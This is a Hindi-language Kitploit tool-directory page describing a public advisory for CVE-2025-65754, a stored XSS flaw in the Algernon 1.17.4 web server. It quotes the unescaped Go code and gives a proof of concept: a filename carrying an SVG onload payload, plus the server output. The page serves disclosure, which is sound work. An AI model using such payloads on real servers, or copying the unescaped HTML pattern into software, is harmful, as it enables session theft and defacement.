Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-65754 — Algernon v1.17.4 एक क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी से प्रभावित है जो हमलावरों को एक फ़ाइलनाम में क्राफ्टेड पेलोड डालकर मनमाना कोड निष्पादित करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/bnyt7/cve-2025-65754
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubbnyt7/cve-2025-65754

CVE-2025-65754

Algernon v1.17.4 एक क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी से प्रभावित है जो हमलावरों को एक फ़ाइलनाम में क्राफ्टेड पेलोड डालकर मनमाना कोड निष्पादित करने की अनुमति देता है।

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-65754 : एल्गरनॉन 1.17.4 में संग्रहीत XSS

विवरण

Algernon v1.17.4 एक क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी से प्रभावित है जो हमलावरों को एक फ़ाइल नाम में तैयार किए गए पेलोड के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।

  • प्रभावित परियोजना : Algernon - 1.17.4
  • परियोजना अनुरक्षक : Alexander F. Rødseth (xyproto)
  • कमजोरी का प्रकार : क्रॉस-साइट स्क्रिप्टिंग (XSS)
  • हमला वेक्टर : एक हमलावर किसी वेबसाइट की सामग्री बदलने या सत्र हाईजैक करने के लिए कुकीज़ चुराने हेतु दुर्भावनापूर्ण नामों वाली फ़ाइलें अपलोड कर सकता है।

कुछ चर संवर्धित (sanitize) नहीं किए गए थे। उदाहरण के लिए :

engine/dirhandler.go लाइनें 80-108

root@kitploit:~

filename := item.Name()  // Get filename from filesystem
// ...
buf.WriteString(themes.HTMLLink(filename, URLpath, ac.fs.IsDir(fullFilename)))

themes/html.go लाइनें 124-132

root@kitploit:~
func HTMLLink(text, url string, isDirectory bool) string {
    if isDirectory {
        text += "/"
        url += "/"
    }
    return "<a href=\"/" + url + "\">" + text + "</a><br>"
    // 'text' (filename) is inserted directly without HTML escaping
}

फ़ाइल सिस्टम से फ़ाइल नामों को डायरेक्टरी लिस्टिंग में HTML एस्केपिंग के बिना सीधे HTML में डाला जाता है।

PoC

root@kitploit:~
$ algernon -v                                  
Algernon 1.17.4

एक डायरेक्टरी में, XSS पेलोड को नाम के रूप में फ़ाइलें बनाएं।

root@kitploit:~
# XSS Payload 1: Simple alert
$touch "test.txt"

# XSS Payload 2: Event handler in filename
$touch "document<svg onload=alert(document.domain)>.svg"

उसी रिपॉजिटरी में, एप्लिकेशन चलाएं।

root@kitploit:~
algernon
root@kitploit:~
Server directory:       .
Server address:         :3000
Database:               Bolt (/tmp/algernon.db)
Cache mode:             On
Cache size:             1048576 bytes
TLS certificate:        cert.pem
TLS key:                key.pem
Request limit:          10/sec per visitor
Large file threshold:   44040192 bytes
Large file timeout:     10 sec
INFO[0000] Serving HTTP/2 on https://localhost:3000/    
ERRO[0000] open cert.pem: no such file or directory. Not serving HTTP/2. 
INFO[0000] Use the -t flag for serving regular HTTP.    
INFO[0000] Serving HTTP on http://localhost:3000/      

निम्नलिखित URL पर जाएँ, एक अलर्ट दिखाई देगा।

XSS अलर्ट ऑनएरर के साथ

XSS अलर्ट डॉक्यूमेंट लोकेशन के साथ

फ़ाइलें

यह समस्या अब v1.17.5 में पैच कर दी गई है।

संदर्भ

  • https://algernon.roboticoverlords.org/
  • https://github.com/xyproto/algernon/releases/tag/v1.17.5
  • https://github.com/xyproto/algernon/commit/cd8832014a624a9aeab60566434c3344135e23f8

खोजकर्ता : Benoit H. (Bnyt7)

टूल डाउनलोड करें